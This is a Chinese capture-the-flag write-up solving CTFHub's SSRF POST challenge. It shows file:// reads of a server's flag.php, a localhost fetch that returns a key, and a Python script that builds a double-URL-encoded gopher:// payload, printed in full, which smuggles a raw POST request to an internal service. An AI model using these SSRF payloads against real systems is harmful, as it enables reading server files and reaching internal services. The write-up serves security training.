CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
ychqsq2 小时前
88.归途
经验分享·职场和发展
kp000003 小时前
Prompt注入攻击(Prompt Injection Attack)
人工智能·安全·网络安全·信息安全·ai安全
三水不滴6 小时前
RAG 系统评测全梳理:三元组方法论 + 分层指标体系
经验分享·笔记
祁白_8 小时前
sqlmap工具
web安全·网络安全·sql注入·sqlmap
智者知已应修善业9 小时前
【proteus交通灯故障检测的完善方案】2025-4-29
经验分享·笔记·单片机·嵌入式硬件·proteus
HackTwoHub9 小时前
等级保护现场测评系统重磅更新,支持 AI 接入,可录入全品类资产清单,自动化巡检核查,批量导出测评归档文件
运维·人工智能·安全·web安全·网络安全·自动化·系统安全
蜜桃味女焊匠人10 小时前
手工氩弧焊高耗气整改实战
人工智能·经验分享·其他·机器人
谷禾牛博10 小时前
肠道菌群检测流程及差异和技术门槛在哪里?
数据库·经验分享·功能测试
卡梅德生物科技小能手12 小时前
卡美德生物科普:PcrV(铜绿假单胞菌毒力蛋白)基础实验研究指南
经验分享·深度学习·生活
数据知道12 小时前
SDN 与软件定义网络的安全边界在哪里?
网络·安全·网络安全